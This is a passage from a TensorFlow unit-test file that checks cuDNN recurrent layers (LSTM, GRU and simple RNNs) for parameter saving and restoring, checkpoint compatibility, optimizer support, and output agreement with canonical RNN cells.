CUDNN_RNN_RELU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_RELU_PARAMS_PER_LAYER
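# These constants count the canonical weight matrices (and matching biases)
# per layer and direction - one per gate and per input/recurrent path -
# e.g. 8 for LSTM (4 gates x 2) and 6 for GRU (3 gates x 2); _CompareBiases()
# below relies on these per-layer counts.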
class CudnnTestModel(object):
"""Model with convenient APIs for easier building and running test graph.
The graph built is used by all tests below to avoid repeatedly building
similar test graphs.
"""
def __init__(self,
rnn_mode,
num_layers,
num_units,
input_size,
direction=CUDNN_RNN_UNIDIRECTION,
dropout=0.,
dtype=dtypes.float32,
training=False,
seed=None,
kernel_initializer=None,
bias_initializer=None):
if dtype not in (dtypes.float16, dtypes.float32, dtypes.float64):
raise ValueError("Invalid dtype: %s" % dtype)
self._dtype = dtype
self._inputs = array_ops.placeholder(
dtype=dtype, shape=[None, None, input_size], name="inputs")
h = array_ops.placeholder(
dtype=dtype, shape=[None, None, num_units], name="h")
c = array_ops.placeholder(
dtype=dtype, shape=[None, None, num_units], name="c")
if rnn_mode == CUDNN_LSTM:
model_fn = cudnn_rnn.CudnnLSTM
self._initial_state = (h, c)
elif rnn_mode == CUDNN_GRU:
model_fn = cudnn_rnn.CudnnGRU
self._initial_state = (h,)
elif rnn_mode == CUDNN_RNN_TANH:
model_fn = cudnn_rnn.CudnnRNNTanh
self._initial_state = (h,)
elif rnn_mode == CUDNN_RNN_RELU:
model_fn = cudnn_rnn.CudnnRNNRelu
self._initial_state = (h,)
else:
raise ValueError("Invalid rnn_mode: %s" % rnn_mode)
self._rnn = model_fn(
num_layers,
num_units,
direction=direction,
dropout=dropout,
dtype=dtype,
seed=seed,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer)
self._rnn.build([None, None, input_size])
self._outputs, self._output_state = self._rnn(
self._inputs, initial_state=self._initial_state, training=training)
def _AddUp(self, outputs, output_state):
total = math_ops.reduce_sum(outputs)
for s in output_state:
total += math_ops.reduce_sum(s)
return total
@property
def inputs(self):
return self._inputs
@property
def initial_state(self):
return self._initial_state
@property
def outputs(self):
return self._outputs
@property
def output_state(self):
return self._output_state
@property
def rnn(self):
return self._rnn
@property
def total_sum(self):
return self._AddUp(self.outputs, self.output_state)
def SynthesizeInput(self, seq_length, batch_size, seed=1234):
"""Synthesizes input and initial state values for testing."""
np.random.seed(seed)
num_layers = self._rnn.num_layers
dir_count = self._rnn.num_dirs
num_units = self._rnn.num_units
input_size = self._rnn.input_size
np_dtype = np.float32 if self._dtype == dtypes.float32 else np.float64
inputs = np.random.randn(seq_length, batch_size,
input_size).astype(np_dtype)
input_h = np.random.randn(num_layers * dir_count, batch_size,
num_units).astype(np_dtype)
if self._rnn.rnn_mode == CUDNN_LSTM:
input_c = np.random.randn(num_layers * dir_count, batch_size,
num_units).astype(np_dtype)
initial_state = (input_h, input_c)
else:
initial_state = (input_h,)
return inputs, initial_state
def ZeroState(self, batch_size):
num_layers = self._rnn.num_layers
dir_count = self._rnn.num_dirs
num_units = self._rnn.num_units
np_dtype = np.float32 if self._dtype == dtypes.float32 else np.float64
input_h = np.zeros((num_layers * dir_count, batch_size,
num_units)).astype(np_dtype)
if self._rnn.rnn_mode == CUDNN_LSTM:
input_c = np.zeros((num_layers * dir_count, batch_size,
num_units)).astype(np_dtype)
initial_state = (input_h, input_c)
else:
initial_state = (input_h,)
return initial_state
def FProp(self, inputs_t, initial_state_t, training):
"""Builds additional subgraph with given inputs and state.
Args:
inputs_t: a tensor.
initial_state_t: a tensor.
training: boolean, true if training mode.
Returns:
A tensor of the forward pass output of the model.
"""
outputs, output_state = self._rnn(
inputs_t, initial_state=initial_state_t, training=training)
return self._AddUp(outputs, output_state)
def Feed(self, sess, inputs, initial_state=None, return_sum=True):
"""Runs graph with given inputs and initial state."""
batch_size = inputs.shape[1]
if initial_state is None:
initial_state = self.ZeroState(batch_size)
if return_sum:
return sess.run(
self.total_sum,
feed_dict={self.inputs: inputs,
self.initial_state: initial_state})
else:
return sess.run(
[self.outputs, self.output_state],
feed_dict={self.inputs: inputs,
self.initial_state: initial_state})
def _CreateCudnnCompatibleCanonicalRNN(rnn, inputs, is_bidi=False, scope=None):
mode = rnn.rnn_mode
num_units = rnn.num_units
num_layers = rnn.num_layers
# To reuse cuDNN-trained models, must use cudnn compatible rnn cells.
if mode == CUDNN_LSTM:
single_cell = lambda: cudnn_rnn_ops.CudnnCompatibleLSTMCell(num_units)
elif mode == CUDNN_GRU:
single_cell = lambda: cudnn_rnn_ops.CudnnCompatibleGRUCell(num_units)
elif mode == CUDNN_RNN_TANH:
single_cell = (lambda: rnn_cell_impl.BasicRNNCell(num_units, math_ops.tanh))
elif mode == CUDNN_RNN_RELU:
single_cell = (
lambda: rnn_cell_impl.BasicRNNCell(num_units, gen_nn_ops.relu))
else:
raise ValueError("%s is not supported!" % mode)
if not is_bidi:
cell = rnn_cell_impl.MultiRNNCell(
[single_cell() for _ in range(num_layers)])
return rnn_lib.dynamic_rnn(
cell, inputs, dtype=dtypes.float32, time_major=True, scope=scope)
else:
cells_fw = [single_cell() for _ in range(num_layers)]
cells_bw = [single_cell() for _ in range(num_layers)]
(outputs, output_state_fw,
output_state_bw) = contrib_rnn_lib.stack_bidirectional_dynamic_rnn(
cells_fw,
cells_bw,
inputs,
dtype=dtypes.float32,
time_major=True,
scope=scope)
return outputs, (output_state_fw, output_state_bw)
class CudnnRNNTestBasic(test_util.TensorFlowTestCase):
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testLayerBasic(self):
num_layers = 4
num_units = 2
batch_size = 8
direction = CUDNN_RNN_UNIDIRECTION
dir_count = 1
with vs.variable_scope("main"):
kernel_initializer = init_ops.constant_initializer(0.)
bias_initializer = init_ops.constant_initializer(0.)
inputs = random_ops.random_uniform([
num_layers * dir_count, batch_size, num_units], dtype=dtypes.float32)
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
# Build the layer
outputs1, _ = lstm(inputs)
# Reuse the layer
outputs2, _ = lstm(inputs)
total_sum1 = math_ops.reduce_sum(outputs1)
total_sum2 = math_ops.reduce_sum(outputs2)
with vs.variable_scope("main", reuse=True):
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
# Reuse the layer
outputs3, _ = lstm(inputs)
total_sum3 = math_ops.reduce_sum(outputs3)
self.assertEqual(1, len(variables.trainable_variables()))
self.assertEqual(1, len(ops.get_collection(ops.GraphKeys.SAVEABLE_OBJECTS)))
self.assertEqual("main/awesome_lstm/opaque_kernel",
variables.trainable_variables()[0].op.name)
with self.test_session(use_gpu=True) as sess:
sess.run(variables.global_variables_initializer())
(total_sum1_v, total_sum2_v, total_sum3_v) = sess.run(
[total_sum1, total_sum2, total_sum3])
self.assertEqual(0, total_sum1_v)
self.assertEqual(0, total_sum2_v)
self.assertEqual(0, total_sum3_v)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testOptimizersSupport(self):
for opt in ("adagrad", "adam", "rmsprop", "momentum", "sgd"):
self._TestOptimizerSupportHelper(opt)
def _GetOptimizer(self, opt):
if opt == "adagrad":
return adagrad.AdagradOptimizer(learning_rate=1e-2)
elif opt == "adam":
return adam.AdamOptimizer(learning_rate=1e-2)
elif opt == "rmsprop":
return rmsprop.RMSPropOptimizer(learning_rate=1e-2)
elif opt == "momentum":
return momentum.MomentumOptimizer(learning_rate=1e-2, momentum=0.9)
elif opt == "sgd":
return gradient_descent.GradientDescentOptimizer(learning_rate=1e-2)
else:
raise ValueError("Unsupported optimizer: %s" % opt)
def _TestOptimizerSupportHelper(self, opt):
num_layers = 4
num_units = 2
batch_size = 8
direction = CUDNN_RNN_UNIDIRECTION
dir_count = 1
with ops.Graph().as_default() as g:
kernel_initializer = init_ops.constant_initializer(0.)
bias_initializer = init_ops.constant_initializer(0.)
inputs = random_ops.random_uniform([
num_layers * dir_count, batch_size, num_units], dtype=dtypes.float32)
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
outputs, _ = lstm(inputs)
loss = math_ops.reduce_sum(outputs)
optimizer = self._GetOptimizer(opt)
train_op = optimizer.minimize(loss)
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
sess.run(train_op)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveableGraphDeviceAssignment(self):
num_layers = 4
num_units = 2
batch_size = 8
direction = CUDNN_RNN_UNIDIRECTION
dir_count = 1
def DeviceFn(op):
if op.type in ("Variable", "VariableV2"):
return "/cpu:0"
else:
return "/gpu:0"
with ops.Graph().as_default() as g:
with ops.device(DeviceFn):
with vs.variable_scope("main"):
kernel_initializer = init_ops.constant_initializer(3.14)
bias_initializer = init_ops.constant_initializer(1.59)
inputs = random_ops.random_uniform(
[num_layers * dir_count, batch_size, num_units],
dtype=dtypes.float32)
lstm = cudnn_rnn.CudnnLSTM(num_layers, num_units,
direction=direction,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
name="awesome_lstm")
outputs = lstm(inputs)
# saver is created in the scope of DeviceFn.
saver = saver_lib.Saver()
with self.test_session(use_gpu=True, graph=g) as sess:
save_path = os.path.join(self.get_temp_dir(),
"test-saveable-device-assignment")
sess.run(variables.global_variables_initializer())
saver.save(sess, save_path)
saver.restore(sess, save_path)
sess.run(outputs)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testDifferentShapesEager(self):
# Checks that kernel caching does not cause sharing of temporary storage
# across different input shapes when executing eagerly.
with context.eager_mode():
with ops.device("gpu:0"):
first_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 28]))
second_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 100]))
self.assertAllEqual([28, 100, 100], first_output.shape)
self.assertAllEqual([28, 100, 100], second_output.shape)
def _LossFunc():
first_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 28]))
second_output, _ = cudnn_rnn.CudnnGRU(1, 100)(
array_ops.zeros([28, 100, 100]))
return (math_ops.reduce_sum(first_output) +
math_ops.reduce_sum(second_output))
backprop.implicit_grad(_LossFunc)()
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testDifferentShapesGraph(self):
# Tests that a single kernel instance presented with multiple input shapes
# does not crash with graph execution.
with ops.device("gpu:0"):
layer = cudnn_rnn.CudnnGRU(1, 100)
layer(array_ops.zeros([28, 100, 100]))
def _Cond(index, accumulation):
del accumulation # unused
return math_ops.less(index, 4)
def _Body(index, accumulation):
layer_input = accumulation[:, :, 10 * (1 + index % 2):]
output, _ = layer(layer_input)
return index + 1, accumulation + output
original_input = array_ops.zeros([28, 100, 100])
_, accumulation = control_flow_ops.while_loop(_Cond, _Body,
[0, original_input])
grad, = gradients.gradients(
math_ops.reduce_sum(accumulation), (original_input,))
init_op = variables.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
accumulation_eval, grad_eval = sess.run((accumulation, grad))
self.assertAllEqual([28, 100, 100], accumulation_eval.shape)
self.assertAllEqual([28, 100, 100], grad_eval.shape)
# TODO(jamesqin): Transform to parameterized test after it is included in the
# TF open source codebase.
class CudnnRNNTestSaveRestore(test_util.TensorFlowTestCase):
def _CompareWeights(self, lhs, rhs):
self.assertEqual(len(lhs), len(rhs))
for lw, rw in zip(lhs, rhs):
self.assertAllEqual(lw, rw)
def _CompareBiases(self, lhs, rhs, rnn_mode, num_layers, direction):
self.assertEqual(len(lhs), len(rhs))
if rnn_mode == CUDNN_LSTM:
num_params_per_layer = CUDNN_LSTM_PARAMS_PER_LAYER
elif rnn_mode == CUDNN_GRU:
num_params_per_layer = CUDNN_GRU_PARAMS_PER_LAYER
elif rnn_mode == CUDNN_RNN_TANH:
num_params_per_layer = CUDNN_RNN_TANH_PARAMS_PER_LAYER
else:
num_params_per_layer = CUDNN_RNN_RELU_PARAMS_PER_LAYER
num_dirs = 1 if direction == CUDNN_RNN_UNIDIRECTION else 2
num_params_per_layer *= num_dirs
self.assertEqual(num_params_per_layer * num_layers, len(lhs))
for i in range(num_layers):
layer_lhs = lhs[i * num_params_per_layer: (i+1) * num_params_per_layer]
layer_rhs = rhs[i * num_params_per_layer: (i+1) * num_params_per_layer]
if direction == CUDNN_RNN_UNIDIRECTION:
self._CompareSingleLayerBiases(layer_lhs, layer_rhs)
else:
size = len(layer_lhs)
fw_lhs, bw_lhs = layer_lhs[:size//2], layer_lhs[size//2:]
fw_rhs, bw_rhs = layer_rhs[:size//2], layer_rhs[size//2:]
self._CompareSingleLayerBiases(fw_lhs, fw_rhs)
self._CompareSingleLayerBiases(bw_lhs, bw_rhs)
def _CompareSingleLayerBiases(self, lhs, rhs):
self.assertEqual(len(lhs), len(rhs))
lf_lhs, rt_lhs = lhs[:len(lhs)//2], lhs[len(lhs)//2:]
lf_rhs, rt_rhs = rhs[:len(rhs)//2], rhs[len(rhs)//2:]
self.assertEqual(len(lf_lhs), len(rt_lhs))
self.assertEqual(len(lf_rhs), len(rt_rhs))
sum_lhs, sum_rhs = [], []
for lf, rt in zip(lf_lhs, rt_lhs):
sum_lhs.append(lf + rt)
for lf, rt in zip(lf_rhs, rt_rhs):
sum_rhs.append(lf + rt)
self.assertEqual(len(sum_lhs), len(sum_rhs))
for lf, rt in zip(sum_lhs, sum_rhs):
self.assertAllEqual(lf, rt)
def _TestSaveRestoreVariable(self, rnn_mode, direction, dtype):
input_size = 3
num_layers = 2
num_units = 7
with ops.Graph().as_default() as g:
random_seed.set_random_seed(1234)
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype)
rnn = model.rnn
save_path = os.path.join(self.get_temp_dir(),
"save-restore-variable-test")
saver = saver_lib.Saver()
weights, biases = model.rnn.saveable._OpaqueParamsToCanonical()
opaque_params = rnn.trainable_variables[0]
# CudnnTestModel() creates CudnnOpaqueParamsSaveable that helps saver save
# Cudnn vars in canonical format.
reset_op = state_ops.assign(
opaque_params,
array_ops.zeros(array_ops.shape(opaque_params), dtype=dtype))
# Passing graph explicitly, otherwise an old sess would be reused.
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
val = saver.save(sess, save_path)
self.assertEqual(save_path, val)
weights_v, biases_v = sess.run([weights, biases])
# Reset opaque param
sess.run(reset_op)
saver.restore(sess, save_path)
weights_v_restored, biases_v_restored = sess.run([weights, biases])
self._CompareWeights(weights_v, weights_v_restored)
self._CompareBiases(biases_v, biases_v_restored, rnn_mode, num_layers,
direction)
def _TestSaveRestoreTwoVariables(self, rnn_mode, direction, dtype):
input_size = 3
num_layers = 2
num_units = 7
with ops.Graph().as_default() as g:
random_seed.set_random_seed(1234)
with vs.variable_scope("m1"):
model1 = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype)
with vs.variable_scope("m2"):
model2 = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype)
opaque_params = (model1.rnn.trainable_variables[0],
model2.rnn.trainable_variables[0])
weights1, biases1 = model1.rnn.saveable._OpaqueParamsToCanonical()
weights2, biases2 = model2.rnn.saveable._OpaqueParamsToCanonical()
reset_params = [
state_ops.assign(params,
array_ops.zeros_like(params, dtype=dtype))
for params in opaque_params
]
reset_op = control_flow_ops.group(*reset_params)
save_path = os.path.join(self.get_temp_dir(),
"save-restore-variable-test2")
saver = saver_lib.Saver()
# Passing graph explicitly, otherwise an old sess would be reused.
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
val = saver.save(sess, save_path)
self.assertEqual(save_path, val)
weights1_v, biases1_v = sess.run([weights1, biases1])
weights2_v, biases2_v = sess.run([weights2, biases2])
sess.run(reset_op)
saver.restore(sess, save_path)
weights1_v_restored, biases1_v_restored = sess.run([weights1, biases1])
weights2_v_restored, biases2_v_restored = sess.run([weights2, biases2])
self._CompareWeights(weights1_v, weights1_v_restored)
self._CompareWeights(weights2_v, weights2_v_restored)
self._CompareBiases(biases1_v, biases1_v_restored, rnn_mode, num_layers,
direction)
self._CompareBiases(biases2_v, biases2_v_restored, rnn_mode, num_layers,
direction)
def _TestSaveRestoreOutput(self, rnn_mode, direction, dtype):
with ops.Graph().as_default() as g:
num_layers = 2
num_units = 7
input_size = 7
seq_length = 8
batch_size = 4
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype,
training=False)
rnn = model.rnn
save_path = os.path.join(self.get_temp_dir(), "save-restore-output-test")
saver = saver_lib.Saver()
# Only one opaque var in a cudnn layer.
assert len(rnn.trainable_variables) == 1
reset_params = state_ops.assign(
rnn.trainable_variables[0],
array_ops.zeros(
array_ops.shape(rnn.trainable_variables[0]), dtype=dtype))
# Passing graph explicitly, otherwise an old sess would be reused.
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
inputs, initial_state = model.SynthesizeInput(seq_length, batch_size)
total_sum_v = model.Feed(sess, inputs, initial_state)
val = saver.save(sess, save_path)
self.assertEqual(save_path, val)
sess.run(reset_params)
saver.restore(sess, save_path)
total_sum_v_restored = model.Feed(sess, inputs, initial_state)
self.assertAllClose(total_sum_v, total_sum_v_restored, atol=1e-5)
def _TestSaveRestoreHelper(self, rnn_mode):
directions = [CUDNN_RNN_UNIDIRECTION, CUDNN_RNN_BIDIRECTION]
dtype_list = [dtypes.float16, dtypes.float32, dtypes.float64]
for direction, dtype in itertools.product(directions, dtype_list):
self._TestSaveRestoreVariable(rnn_mode, direction, dtype)
self._TestSaveRestoreTwoVariables(rnn_mode, direction, dtype)
self._TestSaveRestoreOutput(rnn_mode, direction, dtype)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreRepeatedlyCreateCustomSaveable(self):
input_size = 3
num_layers = 2
num_units = 7
with ops.Graph().as_default():
random_seed.set_random_seed(1234)
model = CudnnTestModel(
CUDNN_LSTM,
num_layers,
num_units,
input_size,
direction=CUDNN_RNN_UNIDIRECTION,
dtype=dtypes.float32)
with self.assertRaisesRegexp(RuntimeError,
"Cudnn saveable already created"):
model.rnn._create_saveable()
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreLSTM(self):
self._TestSaveRestoreHelper(CUDNN_LSTM)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreGRU(self):
self._TestSaveRestoreHelper(CUDNN_GRU)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreRNNTanh(self):
self._TestSaveRestoreHelper(CUDNN_RNN_TANH)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testSaveRestoreRNNRelu(self):
self._TestSaveRestoreHelper(CUDNN_RNN_RELU)
class CudnnRNNTestSaveRestoreCheckpointable(test_util.TensorFlowTestCase):
def _VerifyCheckpoint(
self, checkpoint_path, compatible_cell_fn, cudnn_cell_fn,
num_layers, input_size, expected_variable_values, num_applications=3):
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
with ops.device("gpu:0"):
cudnn_layer = cudnn_cell_fn()
cudnn_checkpoint = checkpointable_utils.Checkpoint(cell=cudnn_layer)
status = cudnn_checkpoint.restore(checkpoint_path)
inputs = 3. * array_ops.ones([num_applications, num_layers, input_size],
dtype=dtypes.float32)
cudnn_output, _ = cudnn_layer(inputs)
status.run_restore_ops()
second_save_path = cudnn_checkpoint.save(checkpoint_prefix)
restore_layer = compatible_cell_fn()
restore_layer_checkpoint = checkpointable_utils.Checkpoint(
cell=restore_layer)
status = restore_layer_checkpoint.restore(second_save_path)
current_state = restore_layer.zero_state(1, dtypes.float32)
for _ in range(num_applications):
restore_layer_output, current_state = restore_layer(
inputs=3. * array_ops.ones([1, input_size]),
state=current_state)
status.run_restore_ops()
self.assertTrue(restore_layer.variables)
for variable, expected_value in zip(
restore_layer.variables, expected_variable_values):
self.assertAllClose(expected_value, self.evaluate(variable))
self.assertAllClose(self.evaluate(restore_layer_output),
self.evaluate(cudnn_output)[-1, -1:, ...])
def _CheckpointableSingleCellUnidirectionalTestTemplate(
self, single_cell_fn, cudnn_cell_fn):
# Single-layer cuDNN cells with object-based checkpointing should be
# checkpoint compatible with either single CudnnCompatible cells or
# MultiRnnCells with one cell.
input_size = 3
save_cell_layer = single_cell_fn()
save_cell_layer(
inputs=array_ops.ones([1, input_size]),
state=save_cell_layer.zero_state(1, dtypes.float32))
self.assertTrue(save_cell_layer.variables)
expected_values = []
np.random.seed(10)
for variable in save_cell_layer.variables:
value = np.random.normal(size=variable.shape)
expected_values.append(value)
self.evaluate(variable.assign(value))
save_checkpoint = checkpointable_utils.Checkpoint(cell=save_cell_layer)
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
first_save_path = save_checkpoint.save(checkpoint_prefix)
self._VerifyCheckpoint(
checkpoint_path=first_save_path,
compatible_cell_fn=
lambda: rnn_cell_impl.MultiRNNCell([single_cell_fn()]),
cudnn_cell_fn=cudnn_cell_fn,
num_layers=1,
expected_variable_values=expected_values,
input_size=input_size)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
@test_util.run_in_graph_and_eager_modes()
def testLSTMCheckpointableSingleLayer(self):
num_units = 2
direction = CUDNN_RNN_UNIDIRECTION
self._CheckpointableSingleCellUnidirectionalTestTemplate(
single_cell_fn=functools.partial(
cudnn_rnn_ops.CudnnCompatibleLSTMCell, num_units=num_units),
cudnn_cell_fn=functools.partial(
cudnn_rnn.CudnnLSTM, num_layers=1, num_units=num_units,
direction=direction, name="awesome_lstm"))
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
@test_util.run_in_graph_and_eager_modes()
def testGRUCheckpointableSingleLayer(self):
num_units = 2
direction = CUDNN_RNN_UNIDIRECTION
with self.assertRaises(NotImplementedError):
# TODO(allenl): Implement object-based saving for GRUs and other cells.
self._CheckpointableSingleCellUnidirectionalTestTemplate(
single_cell_fn=functools.partial(
cudnn_rnn_ops.CudnnCompatibleGRUCell, num_units=num_units),
cudnn_cell_fn=functools.partial(
cudnn_rnn.CudnnGRU, num_layers=1, num_units=num_units,
direction=direction, name="awesome_gru"))
def _CheckpointableMultiLayerTestTemplate(
self, single_cell_fn, cudnn_cell_fn, num_layers):
def _MultiCellFn():
return rnn_cell_impl.MultiRNNCell(
[single_cell_fn() for _ in range(num_layers)])
input_size = 3
save_graph = ops.Graph()
with save_graph.as_default(), self.test_session(graph=save_graph):
save_layer = _MultiCellFn()
save_layer(inputs=array_ops.ones([1, input_size]),
state=save_layer.zero_state(1, dtypes.float32))
self.assertTrue(save_layer.variables)
expected_values = []
np.random.seed(10)
for variable in save_layer.variables:
value = np.random.normal(size=variable.shape)
expected_values.append(value)
self.evaluate(variable.assign(value))
save_checkpoint = checkpointable_utils.Checkpoint(cell=save_layer)
checkpoint_directory = self.get_temp_dir()
checkpoint_prefix = os.path.join(checkpoint_directory, "ckpt")
first_save_path = save_checkpoint.save(checkpoint_prefix)
self._VerifyCheckpoint(
checkpoint_path=first_save_path,
compatible_cell_fn=_MultiCellFn, cudnn_cell_fn=cudnn_cell_fn,
num_layers=num_layers,
expected_variable_values=expected_values,
input_size=input_size)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
@test_util.run_in_graph_and_eager_modes()
def testCudnnCompatibleLSTMCheckpointableMultiLayer(self):
num_units = 2
num_layers = 3
direction = CUDNN_RNN_UNIDIRECTION
self._CheckpointableMultiLayerTestTemplate(
single_cell_fn=functools.partial(
cudnn_rnn_ops.CudnnCompatibleLSTMCell, num_units=num_units),
cudnn_cell_fn=functools.partial(
cudnn_rnn.CudnnLSTM, num_layers=num_layers, num_units=num_units,
direction=direction, name="awesome_lstm"),
num_layers=num_layers)
# TODO(jamesqin): Transform to parameterized test after it is included in the
# TF open source codebase.
class CudnnRNNTestCompatibleRNNCells(test_util.TensorFlowTestCase):
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleLSTM(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_LSTM)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleGRU(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_GRU)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleRNNTanh(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_RNN_TANH)
@unittest.skipUnless(test.is_built_with_cuda(),
"Test only applicable when running on GPUs")
def testCudnnCompatibleRNNRelu(self):
self._TestCudnnCompatibleRnnCellsHelper(CUDNN_RNN_RELU)
def _TestCudnnCompatibleRnnCellsHelper(self, rnn_mode):
configs = [
{
"num_layers": 1,
"seq_length": 3,
"num_units": 4,
"input_size": 5,
"batch_size": 6,
},
{
"num_layers": 2,
"seq_length": 8,
"num_units": 4,
"input_size": 8,
"batch_size": 16,
},
{
"num_layers": 2,
"seq_length": 3,
"num_units": 4,
"input_size": 5,
"batch_size": 6,
},
{
"num_layers": 1,
"seq_length": 2,
"num_units": 2,
"input_size": 4,
"batch_size": 1,
},
]
directions = [CUDNN_RNN_UNIDIRECTION, CUDNN_RNN_BIDIRECTION]
for cfg, direction in zip(configs, directions):
self._TestCudnnCompatibleRnnCells(cfg["num_layers"], cfg["seq_length"],
cfg["num_units"], cfg["input_size"],
cfg["batch_size"], rnn_mode, direction)
def _TestCudnnCompatibleRnnCells(self, num_layers, seq_length, num_units,
input_size, batch_size, rnn_mode, direction):
dtype = dtypes.float32
# Train graph
with ops.Graph().as_default() as g:
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype,
training=True)
target_output = array_ops.placeholder(dtype=dtype)
loss_op = losses.log_loss(
labels=target_output, predictions=model.total_sum)
optimizer = gradient_descent.GradientDescentOptimizer(learning_rate=1e-2)
train_op = optimizer.minimize(loss_op)
saver = saver_lib.Saver()
# Train Cudnn model
seed = 0
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
# Train 128 steps
num_steps = 128
for _ in range(num_steps):
inputs, _ = model.SynthesizeInput(seq_length, batch_size, seed)
targets = np.random.rand()
sess.run(
train_op,
feed_dict={
model.inputs: inputs,
model.initial_state: model.ZeroState(batch_size),
target_output: targets
})
seed += 1
save_path = os.path.join(self.get_temp_dir(),
("cudnn-rnn-%s-test" % rnn_mode))
save_v = saver.save(sess, save_path)
self.assertEqual(save_path, save_v)
# Cudnn inference graph
with ops.Graph().as_default() as g:
model = CudnnTestModel(
rnn_mode,
num_layers,
num_units,
input_size,
direction=direction,
dtype=dtype,
training=False)
rnn = model.rnn
saver = saver_lib.Saver()
inference_input = np.random.rand(seq_length, batch_size,
input_size).astype(np.float32)
with self.test_session(use_gpu=True, graph=g) as sess:
sess.run(variables.global_variables_initializer())
saver.restore(sess, save_path)
# Cudnn inference
cudnn_outputs_v, cudnn_output_states_v = model.Feed(
sess, inference_input, return_sum=False)
# Canonical RNN inference graph
with ops.Graph().as_default() as g:
cell_inputs = array_ops.placeholder(
dtype, shape=[seq_length, batch_size, input_size])
if direction == CUDNN_RNN_UNIDIRECTION:
# outputs is one tensor, states are num_layer tuples, each 2 tensors
(outputs, states) = _CreateCudnnCompatibleCanonicalRNN(rnn, cell_inputs)
if rnn_mode == CUDNN_LSTM:
output_h = array_ops.stack([s.h for s in states])
output_c = array_ops.stack([s.c for s in states])
else:
output_state = array_ops.stack([s for s in states])
else:
# outputs is one tensor.
# states is a tuple of 2 tuples:
# each sub tuple is num_layer tuples, each with 2 tensors.
(outputs, states) = _CreateCudnnCompatibleCanonicalRNN(
rnn, cell_inputs, is_bidi=True)
output_state_fw, output_state_bw = states
if rnn_mode == CUDNN_LSTM:
output_h, output_c = [], []
for s_fw, s_bw in zip(output_state_fw, output_state_bw):
output_h.append(array_ops.stack([s_fw.h, s_bw.h]))
output_c.append(array_ops.stack([s_fw.c, s_bw.c]))
output_h = array_ops.concat(output_h, axis=0)
output_c = array_ops.concat(output_c, axis=0)
else:
output_state = []
for s_fw, s_bw in zip(output_state_fw, output_state_bw):
output_state.append(array_ops.stack([s_fw, s_bw]))
output_state = array_ops.concat(output_state, axis=0)
saver = saver_lib.Saver()
with self.test_session(use_gpu=True, graph=g) as sess:
saver.restore(sess, save_path)
# BlockCell inference
if rnn_mode == CUDNN_LSTM:
outputs_v, output_h_v, output_c_v = sess.run(
[outputs, output_h, output_c],
feed_dict={cell_inputs: inference_input})
self.assertAllClose(cudnn_outputs_v, outputs_v)
cudnn_output_h_v, cudnn_output_c_v = cudnn_output_states_v
self.assertAllClose(cudnn_output_h_v, output_h_v)
self.assertAllClose(cudnn_output_c_v, output_c_v)
else:
outputs_v, output_state_v = sess.run(
[outputs, output_state],
feed_dict={cell_inputs: inference_input})
self.assertAllClose(cudnn_outputs_v, outputs_v, atol=2e-5, rtol=2e-5)
(cudnn_output_h_v,) = cudnn_output_states_v
